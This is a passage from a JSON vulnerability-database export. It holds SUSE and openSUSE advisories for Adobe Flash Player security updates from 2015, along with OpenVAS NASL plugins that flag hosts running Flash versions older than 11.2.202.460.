"CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-16T00:04:48", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00012.html", "id": "SUSE-SU-2015:0723-1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:25", "references": ["https://bugzilla.suse.com/927089"], "affectedPackage": [{"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.457-113.1", "arch": "i586", "packageFilename": "flash-player-gnome-11.2.202.457-113.1.i586.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.457-2.48.1", "arch": "x86_64", "packageFilename": "flash-player-11.2.202.457-2.48.1.x86_64.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.457-2.48.1", "arch": "x86_64", "packageFilename": "flash-player-gnome-11.2.202.457-2.48.1.x86_64.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.457-2.48.1", "arch": "i586", "packageFilename": "flash-player-kde4-11.2.202.457-2.48.1.i586.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.457-2.48.1", "arch": "x86_64", "packageFilename": "flash-player-kde4-11.2.202.457-2.48.1.x86_64.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.457-113.1", "arch": "x86_64", "packageFilename": "flash-player-11.2.202.457-113.1.x86_64.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.457-113.1", "arch": "i586", "packageFilename": "flash-player-11.2.202.457-113.1.i586.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.457-2.48.1", "arch": "i586", "packageFilename": "flash-player-11.2.202.457-2.48.1.i586.rpm", "packageName": "flash-player", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.457-113.1", "arch": "x86_64", "packageFilename": "flash-player-kde4-11.2.202.457-113.1.x86_64.rpm", "packageName": "flash-player-kde4", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.457-113.1", "arch": "x86_64", "packageFilename": "flash-player-gnome-11.2.202.457-113.1.x86_64.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.2", "packageVersion": "11.2.202.457-2.48.1", "arch": "i586", "packageFilename": "flash-player-gnome-11.2.202.457-2.48.1.i586.rpm", "packageName": "flash-player-gnome", "operator": "lt"}, {"OS": "openSUSE NonFree", "OSVersion": "13.1", "packageVersion": "11.2.202.457-113.1", "arch": "i586", "packageFilename": "flash-player-kde4-11.2.202.457-113.1.i586.rpm", "packageName": "flash-player-kde4", "operator": "lt"}], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044).\n\n", "edition": 1, "reporter": "Suse", "published": "2015-04-15T10:04:46", "title": "Security update for Adobe Flash Player (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-15T10:04:46", "id": "OPENSUSE-SU-2015:0718-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00010.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:22", "references": ["https://bugzilla.suse.com/927089"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "11.2.202.457-80.1", "packageName": "flash-player", "packageFilename": "flash-player-11.2.202.457-80.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "11.2.202.457-80.1", "packageName": "flash-player-gnome", "packageFilename": "flash-player-gnome-11.2.202.457-80.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "11.2.202.457-80.1", "packageName": "flash-player", "packageFilename": "flash-player-11.2.202.457-80.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "11.2.202.457-80.1", "packageName": "flash-player-gnome", "packageFilename": "flash-player-gnome-11.2.202.457-80.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "11.2.202.457-80.1", "packageName": "flash-player", "packageFilename": "flash-player-11.2.202.457-80.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "12", "packageVersion": "11.2.202.457-80.1", "packageName": "flash-player-gnome", "packageFilename": "flash-player-gnome-11.2.202.457-80.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "11.2.202.457-80.1", "packageName": "flash-player", "packageFilename": "flash-player-11.2.202.457-80.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Workstation Extension", "OSVersion": "12", "packageVersion": "11.2.202.457-80.1", "packageName": "flash-player-gnome", "packageFilename": "flash-player-gnome-11.2.202.457-80.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044).\n\n", "edition": 1, "reporter": "Suse", "published": "2015-04-15T13:05:12", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for Adobe Flash Player (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2015-04-15T13:05:12", "id": "SUSE-SU-2015:0722-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00011.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "references": ["https://bugzilla.suse.com/914333", "https://bugzilla.suse.com/905032", "https://bugzilla.suse.com/914463", "https://bugzilla.suse.com/922033", "https://bugzilla.suse.com/907257", "https://bugzilla.suse.com/901334", "https://bugzilla.suse.com/909219", "https://bugzilla.suse.com/927089", "https://bugzilla.suse.com/856386", "https://bugzilla.suse.com/913057"], "affectedPackage": [{"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.457-158.1", "packageName": "flash-player-kde4", "packageFilename": "flash-player-kde4-11.2.202.457-158.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.457-158.1", "packageName": "flash-player-gnome", "packageFilename": "flash-player-gnome-11.2.202.457-158.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.457-158.1", "packageName": "flash-player-gnome", "packageFilename": "flash-player-gnome-11.2.202.457-158.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.457-158.1", "packageName": "flash-player", "packageFilename": "flash-player-11.2.202.457-158.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.457-158.1", "packageName": "flash-player", "packageFilename": "flash-player-11.2.202.457-158.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE Evergreen", "OSVersion": "11.4", "packageVersion": "11.2.202.457-158.1", "packageName": "flash-player-kde4", "packageFilename": "flash-player-kde4-11.2.202.457-158.1.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044)\n\n", "edition": 1, "reporter": "Suse", "published": "2015-04-16T13:04:48", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "Security update for Adobe Flash Player (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2014-0581", "CVE-2014-0574", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2014-0576", "CVE-2015-0353", "CVE-2015-3041", "CVE-2014-0590", "CVE-2015-0350", "CVE-2014-8442", "CVE-2015-3040", "CVE-2014-0583", "CVE-2015-0349", "CVE-2014-0577", "CVE-2015-0352", "CVE-2014-0569", "CVE-2014-0589", "CVE-2014-0584", "CVE-2015-3044", "CVE-2015-0331", "CVE-2014-0558", "CVE-2014-0586", "CVE-2015-0347", "CVE-2015-0354", "CVE-2014-0573", "CVE-2014-0585", "CVE-2015-3039", "CVE-2014-8437", "CVE-2015-0360", "CVE-2014-0582", "CVE-2015-3038", "CVE-2015-0359", "CVE-2014-0588", "CVE-2015-0356", "CVE-2015-3043", "CVE-2014-8440", "CVE-2015-3042", "CVE-2014-8438", "CVE-2015-0332", "CVE-2014-0564", "CVE-2014-8441"], "modified": "2015-04-16T13:04:48", "id": "OPENSUSE-SU-2015:0725-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00013.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-09-01T23:51:01", "references": ["https://security.gentoo.org/glsa/201505-02"], "pluginID": "1361412562310121376", "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201505-02", "edition": 5, "reporter": "Eero Volotinen", "published": "2015-09-29T00:00:00", "title": "Gentoo Linux Local Check: https://security.gentoo.org/glsa/201505-02", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310121376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121376", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo Linux security check\n# $Id: glsa-201505-02.nasl 9374 2018-04-06 08:58:12Z cfischer $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121376\");\nscript_version(\"$Revision: 9374 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:28:49 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:58:12 +0200 (Fri, 06 Apr 2018) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201505-02\");\nscript_tag(name: \"insight\", value: \"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201505-02\");\nscript_cve_id(\"CVE-2015-3044\",\"CVE-2015-3077\",\"CVE-2015-3078\",\"CVE-2015-3079\",\"CVE-2015-3080\",\"CVE-2015-3081\",\"CVE-2015-3082\",\"CVE-2015-3083\",\"CVE-2015-3084\",\"CVE-2015-3085\",\"CVE-2015-3086\",\"CVE-2015-3087\",\"CVE-2015-3088\",\"CVE-2015-3089\",\"CVE-2015-3090\",\"CVE-2015-3091\",\"CVE-2015-3092\",\"CVE-2015-3093\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201505-02\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.460 \"), vulnerable: make_list(\"lt 11.2.202.460 \"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:50:17", "references": ["2015:0878_1"], "pluginID": "1361412562310851099", "description": "Check the version of flash-player", "edition": 6, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-10-16T00:00:00", "title": "SuSE Update for flash-player SUSE-SU-2015:0878-1 (flash-player)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310851099", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851099", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2015_0878_1.nasl 8046 2017-12-08 08:48:56Z santu $\n#\n# SuSE Update for flash-player SUSE-SU-2015:0878-1 (flash-player)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851099\");\n script_version(\"$Revision: 8046 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:48:56 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 20:00:42 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for flash-player SUSE-SU-2015:0878-1 (flash-player)\");\n script_tag(name: \"summary\", value: \"Check the version of flash-player\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"\n The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_tag(name: \"affected\", value: \"flash-player on SUSE Linux Enterprise Desktop 12\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"SUSE-SU\", value: \"2015:0878_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"SLED12.0SP0\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.460~83.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.460~83.1\", rls:\"SLED12.0SP0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:50:18", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "1361412562310805619", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "edition": 4, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-05-15T00:00:00", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Linux)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2017-06-27T00:00:00", "id": "OPENVAS:1361412562310805619", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805619", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_mult_vuln01_may15_lin.nasl 6443 2017-06-27 10:00:22Z teissa $\n#\n# Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Linux)\n#\n# Authors:\n# Rinu <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805619\");\n script_version(\"$Revision: 6443 $\");\n script_cve_id(\"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\",\n \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\",\n \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\",\n \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\",\n \"CVE-2015-3093\");\n script_bugtraq_id(74614, 74605, 74612, 74608, 74613, 74610, 74616, 74609, 74617);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-06-27 12:00:22 +0200 (Tue, 27 Jun 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-05-15 12:39:35 +0530 (Fri, 15 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 May15 (Linux)\");\n\n script_tag(name: \"summary\" , value: \"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name: \"vuldetect\" , value: \"Get the installed version with the help\n of detect NVT and check the version is vulnerable or not.\");\n\n script_tag(name: \"insight\" , value: \"Multiple flaws exists due to,\n - Improper validation of user supplied input.\n - A flaw in the Broker that is due to the BrokerCreateFile method not properly\n sanitizing user input.\n - An integer overflow condition that is triggered as user-supplied input is\n not properly validated.\n - An overflow condition that is triggered as user-supplied input is not\n properly validated.\n - Multiple unspecified memory disclosure flaws in Adobe Flash Player.\n - Multiple unspecified type confusion flaws in Adobe Flash Player.\n - Multiple unspecified flaws in Adobe Flash Player.\n - A a use-after-free error Adobe Flash Player.\n - An unspecified TOCTOU flaw in Adobe Flash Player.\");\n\n script_tag(name: \"impact\" , value: \"Successful exploitation will allow a\n context-dependent attacker to corrupt memory and potentially execute arbitrary\n code, bypass security restrictions and gain access to sensitive information,\n bypass protected mode, bypass validation mechanisms and write arbitrary data,\n bypass the sandbox when chained with another vulnerability, bypass ASLR\n protection mechanisms.\n\n Impact Level: System/Application.\");\n\n script_tag(name: \"affected\" , value:\"Adobe Flash Player versions before\n 11.2.202.460 on Linux.\");\n\n script_tag(name: \"solution\" , value:\"Upgrade to Adobe Flash Player version\n 11.2.202.460 or later. For updates refer to\n http://get.adobe.com/flashplayer\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"URL\" , value : \"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n## Variable Initialization\nplayerVer = \"\";\n\n## Get version\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Grep for vulnerable version\nif(version_is_less(version:playerVer, test_version:\"11.2.202.460\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + \"11.2.202.460\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-18T13:39:22", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "1361412562310805620", "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "edition": 7, "reporter": "Copyright (C) 2015 Greenbone Networks GmbH", "published": "2015-05-15T00:00:00", "title": "Adobe Air Multiple Vulnerabilities - 01 May15 (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3081", "CVE-2015-3088", 